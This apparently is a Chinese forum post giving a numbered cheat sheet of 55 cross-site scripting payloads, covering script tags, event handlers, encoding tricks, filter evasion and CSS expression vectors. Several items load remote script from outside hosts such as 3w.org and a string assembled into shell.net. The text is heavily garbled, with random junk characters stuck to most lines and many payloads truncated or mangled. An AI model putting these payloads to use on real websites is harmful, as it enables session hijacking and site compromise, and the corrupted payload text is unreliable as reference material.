(1)普通的XSS JavaScript注入3 i0 {9 L! G3 Q, `! \7 W" @, @
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( _5 d- I2 x0 Y0 p* v9 W, Q- _(99)另类弹框& |2 l: F2 N; }) u8 Q
<q/oncut=alert()>1( Z; k8 o; o/ y( l
<s/onclick=alert()>b
% q& P$ y# b" x <XSS=" onclick="alert(1)//">clickme</SSX=">
! x, q- _. I4 G, M5 Y0 B, ~+ u <zzz onclick=alert`1`>clickme</zzz>
+ @' a8 w1 k- H9 l6 F <a onclick=alert`1`>clickme</a>/ K+ E; u4 N% c5 ?
<a=">clickme</a=">/ G& o2 x* g7 o* @. `; @+ q
<a=">clickme</a>
2 z% `1 `- ~5 i, [) x! G<z=">clickme</z=">
, N4 `/ b( n$ v% w" ?* N4 T<z onclick=alert`1`>clickme</z>
5 h) N0 y! |% C u4 y: S
- m7 S ?: O* Z* ^( X2 a+ {" A(2)IMG标签XSS使用JavaScript命令4 u H* M' g l% p
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
( l f' s( u' ]1 e7 n# q/ X/ d9 z% e: C- D
(3)IMG标签无分号无引号
0 h1 R9 h( H4 x- h<IMG SRC=javascript:alert(‘XSS’)># M; k9 H8 u1 n! R% |/ w% f( X
0 H0 v+ s# R, g(4)IMG标签大小写不敏感
9 ~7 X5 l+ x. ]# p. T4 {2 P* [<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
' R- `5 }/ V% a J: Z
% Q& z% H$ d- l [5 p/ w(5)HTML编码(必须有分号) J4 _% g& k5 P u# ~
<IMG SRC=javascript:alert(“XSS”)>
6 ^ a2 ]6 I: N6 G, r, \# j ]! o9 T: \" ]* ~5 j6 Z
(6)修正缺陷IMG标签3 w( J! L% B! `+ |' H5 ]! x3 z9 a2 Q
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>7 R" C1 G/ m5 R% d! b- g! ]
4 v0 I5 s' a8 X# p(7)formCharCode标签(计算器)9 b' P# b# Y( J% Z% D1 p% x
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>$ ]$ b6 R( s) o. D2 u
/ b# ` [4 T7 B; r3 z7 o9 @2 _(8)UTF-8的Unicode编码(计算器)$ b# L* M& E1 h% x' C6 y! d+ N& K$ @
<IMG SRC=jav..省略..S')>/ ]! b* f- n$ U! B' ?2 n
& D5 r$ ?, l! N4 G(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 [2 g H0 w7 P2 @) s8 G/ l
<IMG SRC=jav..省略..S')>; }* {: v7 J, X* c/ e8 b0 S x
# K9 p9 O5 L" L8 b/ |3 U
(10)十六进制编码也是没有分号(计算器)
$ b4 V( P/ {! |8 i<IMG SRC=\'#\'" /span>3 t, l" W1 L! ` w+ f, M; C
' b+ F( H& K- I(11)嵌入式标签,将Javascript分开
: k- g: S7 H& k<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>& e9 d0 z& W3 X
! E6 q; \5 @+ D) d(12)嵌入式编码标签,将Javascript分开
4 N$ n1 F3 D" y, P G/ b; R* H! j+ \<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' \: X. g% n ] T. K
$ m! z, I0 \& j7 M |8 s/ l9 Q(13)嵌入式换行符% i8 u n+ M# q8 e: ~7 q# \
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>. Q y7 l4 U2 ? B9 b
% n0 ~& ]( e* J* ? n7 z(14)嵌入式回车& P# y) l3 k: v* a, q' a( _7 T& N
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>7 ]! N7 N6 d. e! ?
& V& ^- q$ S: ]' P( F9 q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子0 h P# P5 e; w/ Y+ [
<IMG SRC=\'#\'" /span>
0 U* B: s0 z8 F5 c2 m5 G: s" S+ {+ J B0 z5 g7 p ^
(16)解决限制字符(要求同页面)2 X8 B* Y& C& T; {+ |8 d
<script>z=’document.’</script>+ M+ _! B& h: |3 Y2 e- H
<script>z=z+’write(“‘</script>
9 X1 d1 ~0 m7 z<script>z=z+’<script’</script>) Z$ E1 b6 g) o2 E3 N. l* y
<script>z=z+’ src=ht’</script>% V2 c( s) c( }/ A
<script>z=z+’tp://ww’</script>
! @) C# R; u4 ?0 q1 O. n<script>z=z+’w.shell’</script>4 Y- M' z1 \* H" V0 w1 n
<script>z=z+’.net/1.’</script>! K( {8 m# b5 v( ~1 d
<script>z=z+’js></sc’</script>" k# M6 D6 o1 C% U
<script>z=z+’ript>”)’</script>* d% U" n5 \8 D/ c$ [8 s
<script>eval_r(z)</script>1 W/ t3 S! W. H- y$ S& ~0 d1 U
+ Q7 b" o) @) F# _! g) T(17)空字符; Z8 S/ M. h: Z. `7 ]% i* t; u
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out! e% O6 G1 A. Z0 m) \ D$ Z
9 X' R& M2 w; ?9 M$ |
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用) @: P. Y; U6 w0 Q8 y4 A6 I p
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out& _) q& | ]) A$ W( t* V& b
, U, s d5 R5 m5 B2 j$ J/ p8 y, [
(19)Spaces和meta前的IMG标签5 V/ h2 B- {- S
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>3 F$ T. o" I. R! W
+ U7 e' P0 ?6 n# ~" i% _(20)Non-alpha-non-digit XSS, f% i7 S$ X/ R
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>; @. q6 h: _4 A; F/ Z3 ~
1 l# ]1 |+ ]7 W% ]$ L4 L
(21)Non-alpha-non-digit XSS to 2' q7 G1 |/ d% p7 E% X* [8 Z
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
# r, n) t; z( y; ~
+ i: I1 C+ X( @(22)Non-alpha-non-digit XSS to 32 f" ^/ A* o4 \) A
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
N6 a" Q3 }4 u4 j/ E4 C# s# T
6 c g6 \% {. U8 j7 A(23)双开括号
# m* ]$ S5 p/ H2 c6 o<<SCRIPT>alert(“XSS”);//<</SCRIPT>
& C R3 {. e9 n+ v' u: k6 \1 W% w1 D6 }- X+ c* w V. @6 D
(24)无结束脚本标记(仅火狐等浏览器)
4 c7 M' ^ q5 ], A: ]* Y<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>5 d8 w" n6 x' v6 H1 P; d3 X
& _5 b" r# X: |4 @" Z) A; | n- w(25)无结束脚本标记2
0 b2 i% o# Y: n- R<SCRIPT SRC=//3w.org/XSS/xss.js>
& _% G" Z% ~; {; d: S; P
: V/ h& H* K5 U) S(26)半开的HTML/JavaScript XSS
9 E. e3 f& B; a* n<IMG SRC=\'#\'" /span>8 y. Q* {# r; P- o2 F
, t) G& L/ p( j. r6 e, C' t; t(27)双开角括号
, y0 p: `! D0 R8 ^2 Q \ G<iframe src=http://3w.org/XSS.html <; C5 k* J: h$ `, v
2 ^2 d5 A) p% p4 n, }
(28)无单引号 双引号 分号4 b9 D- h% O F- I( f \
<SCRIPT>a=/XSS/6 n* F6 ?! W, ~! d
alert(a.source)</SCRIPT>
9 ~8 V% v& F' ?! ^+ I4 J4 e. E" ?" T6 F
(29)换码过滤的JavaScript* g# @, y o6 A0 c) r ~# Y! x- P
\”;alert(‘XSS’);//6 i! }- V" P9 L$ o' p) P3 o& A
( V2 h5 ^: Z9 A6 R! j(30)结束Title标签
" {7 X6 }1 a5 J5 G3 N. R</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ o/ u6 W$ Z+ Q/ a
0 Z; v' r: N8 H! p0 ~" c
(31)Input Image5 z3 N9 f2 Z% s
<INPUT SRC=\'#\'" /span>0 z D1 _3 ], v5 \& Y
8 a' K7 N: f' X; R7 O' ]5 z7 G(32)BODY Image
0 q1 J4 H$ N5 G' h<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
8 j) G& Y( ?0 ^* m5 c1 m+ S/ F$ S3 k* B2 M: u1 Z
(33)BODY标签
& ?5 G6 Z' ~) y# P$ H<BODY(‘XSS’)>5 q& q6 M' a0 A: ~/ n1 f9 ]/ J
+ W. e L8 s3 m
(34)IMG Dynsrc* a2 H) x! N/ r6 M- t, U0 A3 }
<IMG DYNSRC=\'#\'" /span>6 @8 o" q6 D9 V+ t4 e
8 |9 N- E8 ]0 x5 l(35)IMG Lowsrc
. ^# U0 ] O( Q8 N v* h0 e8 e<IMG LOWSRC=\'#\'" /span>
) {+ m, ~/ b- t' n$ m" `+ ^% Z; t8 l. P: ^% i2 [
(36)BGSOUND
. @9 @8 W" b1 I4 C% X<BGSOUND SRC=\'#\'" /span>! m- ^# [2 s' F# ^; `, V7 }
5 Q/ x2 z6 \9 |, `. f(37)STYLE sheet
+ p& l9 d) @& j& B$ u' X<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
$ p( Y8 T1 S* P0 a9 u$ y$ X+ h7 o0 R* ?
(38)远程样式表) I' R7 h$ W- t% C
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
9 ]: N+ ?1 {3 M) A& z: N1 v$ X: v1 y. e9 l9 Y" ^+ ]
(39)List-style-image(列表式)8 a5 @. d0 J# x( z! h3 W3 j
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 K# c" C6 ^/ R# l9 R* h6 @0 K6 k# d# S: C
(40)IMG VBscript
$ C4 ^6 E/ X+ j2 Y: a$ h<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
9 @4 R3 G! u4 {9 x+ V: u/ Z# h5 K( j2 O# F# R
(41)META链接url
+ Z" a$ Z+ x7 N. F9 o8 [+ [<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>9 W& G- E9 y* J! l$ G1 Z7 _9 v
* r. U0 l( y' e$ {2 v3 |" i l( {1 v(42)Iframe
y+ @; z$ ~& f. K }$ d( j<IFRAME SRC=\'#\'" /IFRAME># I7 j+ I4 c& L
( ~5 D O% c+ [, f. {3 ?3 O(43)Frame/ Q& \+ Q. i( _2 U* ?5 T
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
4 s+ G0 X: b+ h! s, J7 M- z$ W% t1 i7 L1 T# Y$ S5 a
(44)Table' u, n: p1 k- C' ~# e
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
) s1 p7 X2 V9 Z ?- ?- t
: I6 N) Z9 T- g+ u1 G/ K3 e1 a(45)TD
- {$ K! a- i! M; Q5 `) J, z' C& S<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 K; T, v# P! A6 r; n+ \- C
1 [) f; B+ C' P2 ?% |# [! J4 g(46)DIV background-image
4 C0 R- U/ q; l+ o9 ~0 b<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, }# q* j7 T& W& J/ e
( G Y8 Y) B! n
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
`& U! a$ a+ ^9 @ N/ E<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>; O4 J0 y7 j" V: z5 K
/ i7 b c; N, h(48)DIV expression
1 w- {/ G3 u/ M7 Q" R<DIV STYLE=”width: expression_r(alert(‘XSS’));”>3 k G3 b. H2 _+ I# _: B, X
# G& l' D" N: b, o: m6 r0 z& r
(49)STYLE属性分拆表达
# S' O( j7 f9 S' g3 d<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>4 m4 Q/ G2 Q9 |7 e1 k& O* o
9 d+ }3 M4 e# L' P( v
(50)匿名STYLE(组成:开角号和一个字母开头)
; T( d9 |# q# `- r, I; u. i<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
, P F( `" ]: I4 K) G" K' F
0 u# ~( S9 ~9 Z. R* M: e3 a(51)STYLE background-image
/ s2 u7 E5 i; F9 I2 h<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>3 |2 o* m1 r5 l9 r1 Q2 i
/ u! E; |- p1 ^+ v3 R/ W3 f
(52)IMG STYLE方式# c2 u- z9 u, C! R! l$ J
exppression(alert(“XSS”))’>
2 a5 M+ ~) I! |) Z$ _; U9 ]/ p' Y) T" H+ s$ o0 h
(53)STYLE background1 h3 L5 v4 I9 w' O" `5 O. {8 v
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% {1 P6 z$ l+ j0 O8 _' X2 _) I: L4 Z' {% Q: |) v
(54)BASE
( X: o% b. y6 a2 m' K B- D6 B. s<BASE HREF=”javascript:alert(‘XSS’);//”>$ T- [4 S& S- P f; R% m
) t) z/ N& Z( @4 B5 S$ x(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
3 K: j' [( b& H b& N<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>) e9 H) r! N! K' v0 `
|
发表于 2016-4-28 10:06:15
收藏
支持
反对